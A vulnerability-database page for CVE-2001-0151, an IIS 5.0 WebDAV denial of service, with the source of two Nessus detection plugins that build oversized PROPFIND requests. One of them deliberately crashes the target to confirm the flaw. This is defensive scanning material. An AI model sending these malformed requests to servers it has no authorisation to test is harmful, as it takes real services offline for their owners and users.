Vulnerabilities > CVE-2001-0151 - Unspecified vulnerability in Microsoft Internet Information Services 5.0
Attack vector: NETWORK
Attack complexity: LOW
Privileges required: NONE
Confidentiality impact: NONE
Integrity impact: NONE
Availability impact: PARTIAL
Summary
IIS 5.0 allows remote attackers to cause a denial of service via a series of malformed WebDAV requests.
Vulnerable Configurations
Part | Description | Count |
---|---|---|
Application | 1 |
Exploit-Db
description | Microsoft IIS 5.0 WebDAV Denial of Service Vulnerability. CVE-2001-0151. DoS exploit for the Windows platform |
id | EDB-ID:20664 |
last seen | 2016-02-02 |
modified | 2001-03-08 |
published | 2001-03-08 |
reporter | Georgi Guninski |
source | https://www.exploit-db.com/download/20664/ |
title | Microsoft IIS 5.0 WebDAV Denial of Service Vulnerability |
Nessus
NASL family Web Servers NASL id IIS_PROPFIND_DOS.NASL description It was possible to disable the remote IIS server by making a specially formed PROPFIND request. last seen 2020-06-01 modified 2020-06-02 plugin id 10631 published 2001-03-08 reporter This script is Copyright (C) 2001-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/10631 title Microsoft IIS WebDAV Malformed PROPFIND Request Remote DoS code
#
# (C) Tenable Network Security, Inc.
#
# This security check is heavily based on Georgi Guninski's post
# on the bugtraq mailing list
#
# Reviewer overview: this plugin confirms CVE-2001-0151 by sending the
# malformed PROPFIND request for real and then testing whether the web
# server still answers. It is registered as ACT_DENIAL, so a positive
# result means the scanned service was actually taken down. Schedule it
# only against systems where an outage is acceptable; Nessus does not run
# ACT_DENIAL plugins while "safe checks" are enabled.

include("compat.inc");

if(description)
{
 script_id(10631);
 script_version ("1.39");
 script_cve_id("CVE-2001-0151");
 script_bugtraq_id(2453);
 script_xref(name:"MSKB", value:"291845");
 script_xref(name:"MSFT", value:"MS01-016");

 script_name(english: "Microsoft IIS WebDAV Malformed PROPFIND Request Remote DoS");

 script_set_attribute(attribute:"synopsis", value: "The remote web server is vulnerable to a denial of service." );
 script_set_attribute(attribute:"description", value: "It was possible to disable the remote IIS server by making a specially formed PROPFIND request." );
 # The solution text only names the workaround (turning WebDAV / PROPFIND
 # off). The vendor bulletin MS01-016 referenced by the xref above and the
 # see_also below is where to look for the actual fix.
 script_set_attribute(attribute:"solution", value: "Disable the WebDAV extensions, as well as the PROPFIND method." 
);
 # NOTE(review): this vector rates availability as Complete (A:C), while the
 # CVE record on this page lists the availability impact as PARTIAL. Treat
 # the plugin severity and the CVE score as two separate ratings.
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"see_also", value:"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2001/ms01-016" );
 script_set_attribute(attribute:"plugin_publication_date", value: "2001/03/08");
 script_set_attribute(attribute:"vuln_publication_date", value: "2001/03/08");
 script_cvs_date("Date: 2018/11/15 20:50:25");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_set_attribute(attribute:"cpe", value:"cpe:/a:microsoft:iis");
 script_end_attributes();

 script_summary(english: "Performs a denial of service against IIS");
 # ACT_DENIAL: the check is intrusive by design (see the overview above).
 script_category(ACT_DENIAL);
 script_dependencie("find_service1.nasl", "http_version.nasl", "www_fingerprinting_hmap.nasl");
 script_family(english: "Web Servers");
 script_copyright(english:"This script is Copyright (C) 2001-2018 Tenable Network Security, Inc.");
 script_require_ports("Services/www", 80);
 exit(0);
}

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

# Sends one PROPFIND request for "/" whose XML body contains a property
# element with a name built from crap(128008), i.e. 128008 bytes of filler.
# The response is stored in r but never inspected; the caller decides the
# outcome from whether the server is still reachable afterwards.
# For network monitoring, the distinguishing trait of this request is a
# PROPFIND body whose element name is far longer than any real property name.
function dos(port)
{
 local_var xml, r;
 xml = '<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="over:"><a:prop><a:displayname /><u:' + crap(128008) + ' /></a:prop></a:propfind>\r\n';
 r = http_send_recv3(port: port, item: '/', method: 'PROPFIND', data: xml, add_headers: make_array('Content-Type', 'text/xml') );
}

port = get_http_port(default:80);
# Stop if the server is already unresponsive, so that a pre-existing outage
# is not reported as this vulnerability.
if (http_is_dead(port: port)) exit(0);
banner = get_http_banner(port:port);
# ">!<" is the NASL "does not contain" operator. Only the product name is
# matched, so the check proceeds against any IIS version, not just 5.0.
if ("Microsoft-IIS" >!< banner ) exit(0);

# The request is sent twice, pausing 1 second and then 2 seconds.
for (i = 1; i <= 2; i ++)
{
 dos(port:port);
 sleep(i);
}

# The finding rests only on the server no longer answering after the two
# requests (checked with retry: 3).
# NOTE(review): anything else that cuts off the scanner at this moment, such
# as an inline filter blocking the source, would presumably be reported the
# same way - confirm the result on the host itself before acting on it.
if (http_is_dead(port: port, retry: 3)) security_hole(port);
NASL family Web Servers NASL id IIS_PROPFIND2.NASL description The remote version of the IIS web server contains a bug in its implementation of the WebDAV protocol that could allow an attacker to temporarily disable this service remotely. To exploit this flaw, an attacker would require the ability to send a malformed PROPFIND request to the remote host, although this would not in turn necessarily require authentication. last seen 2020-06-01 modified 2020-06-02 plugin id 10667 published 2001-05-13 reporter This script is Copyright (C) 2001-2018 John Lampe source https://www.tenable.com/plugins/nessus/10667 title Microsoft IIS 5.0 WebDAV Malformed PROPFIND Request Remote DoS code
#
# This script is based on Georgi Guninski's perl script
# ported to NASL by John Lampe <[email protected]>
#
# See the Nessus Scripts License for details
# Changes by Tenable
# Add MSKB script_xref (8/29/17)
#
# Reviewer overview: unlike a check that waits for the server to stop
# answering, this plugin sends a single PROPFIND with a 1025-byte property
# element name and reports a warning when the server answers with HTTP 207.
# The result is an inference from that status code, not an observed outage.
# The plugin marks itself "potential_vulnerability" and only runs when the
# scan is configured for paranoid reporting.

include("compat.inc");

if (description)
{
 script_id(10667);
 script_version("1.51");
 script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");

 script_cve_id("CVE-2001-0151");
 script_bugtraq_id(2453);
 script_xref(name:"MSFT", value:"MS01-016");
 script_xref(name:"MSKB", value:"291845");

 script_name(english:"Microsoft IIS 5.0 WebDAV Malformed PROPFIND Request Remote DoS");
 script_summary(english:"Attempts to crash the Microsoft IIS server");

 script_set_attribute(attribute:"synopsis", value:"The remote web server is vulnerable to a denial of service attack.");
 script_set_attribute(attribute:"description", value: "The remote version of the IIS web server contains a bug in its implementation of the WebDAV protocol that could allow an attacker to temporarily disable this service remotely. 
To exploit this flaw, an attacker would require the ability to send a malformed PROPFIND request to the remote host, although this would not in turn necessarily require authentication.");
 script_set_attribute(attribute:"see_also", value:"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2001/ms01-016");
 script_set_attribute(attribute:"solution", value:"Microsoft has released a patch for IIS 5.0.");
 # Availability is rated Partial here (A:P), matching the CVE record's
 # "Availability impact: PARTIAL".
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"vuln_publication_date", value:"2001/03/08");
 script_set_attribute(attribute:"plugin_publication_date", value:"2001/05/13");
 # Flags the finding as unconfirmed; see the 207 check at the end.
 script_set_attribute(attribute:"potential_vulnerability", value:"true");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_set_attribute(attribute:"cpe", value:"cpe:/a:microsoft:iis");
 script_end_attributes();

 script_category(ACT_ATTACK);
 script_copyright(english:"This script is Copyright (C) 2001-2020 John Lampe");
 script_family(english:"Web Servers");

 script_dependencie("find_service1.nasl", "http_version.nasl", "www_fingerprinting_hmap.nasl");
 script_require_keys("Settings/ParanoidReport");
 script_require_ports("Services/www", 80);
 exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("http_func.inc");

# Runs only at paranoia level 2 or higher; otherwise the plugin audits out.
if (report_paranoia < 2) audit(AUDIT_PARANOID);

port = get_http_port(default:80, embedded:TRUE);

# Prefer the hmap fingerprint stored in the KB and fall back to the banner.
# If a signature exists and does not contain "IIS/5", stop. If no signature
# could be obtained at all, the check continues.
sig = get_kb_item("www/hmap/" + port + "/description");
if (! sig ) sig = get_http_banner(port:port);
if ( sig && "IIS/5" >!< sig ) exit(0);
if (! get_port_state(port)) exit(0);

# Step 1: ask which methods the server allows and stop unless PROPFIND is
# advertised in the Allow header. A server with WebDAV disabled exits here.
req = 'OPTIONS / HTTP/1.0\r\n\r\n';
soc = open_sock_tcp(port);
if (! soc )exit(0);
send(socket:soc, data:req);
r = http_recv(socket:soc);
close(soc);
if (! r ) exit(0);
if (!egrep(pattern:"^Allow:.*PROPFIND", string:r) ) exit(0);

# NOTE(review): quote is assigned but not used anywhere in the visible script.
quote = raw_string(0x22);

# Step 2: build a PROPFIND body whose property element name is crap(1025),
# i.e. 1025 bytes of filler.
xml = strcat('<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u=":dav">', '<a:prop><a:displayname /><u:', crap(1025), ' /></a:prop></a:propfind>\r\n\r\n' );
l = strlen(xml);
# Content-length is taken from strlen(xml); the three CRLF pairs appended
# after xml are sent in addition to the declared length.
req = string ("PROPFIND / HTTP/1.1\r\n", "Content-type: text/xml\r\n", "Host: ", get_host_name() , "\r\n", "Content-length: ", l, "\r\n\r\n", xml, "\r\n\r\n\r\n");

soc = http_open_socket(port);
if(! soc ) exit(0);
send(socket:soc, data:req);
r = http_recv(socket:soc);
http_close_socket(soc);

# HTTP 207 (Multi-Status) is the normal success response to PROPFIND. The
# plugin warns whenever the server accepted and processed the request.
# NOTE(review): this presumably relies on a patched server answering with a
# different status - confirm against MS01-016. Verify the patch level on the
# host before treating the warning as confirmed.
if ( r =~ "HTTP/[0-9.]+ 207 " ) security_warning(port);
Oval
accepted | 2011-05-16T04:03:34.574-04:00 |
class | vulnerability |
contributors |
description | IIS 5.0 allows remote attackers to cause a denial of service via a series of malformed WebDAV requests. |
family | windows |
id | oval:org.mitre.oval:def:90 |
status | accepted |
submitted | 2003-10-10T12:00:00.000-04:00 |
title | IIS Denial of Service via WebDAV |
version | 33 |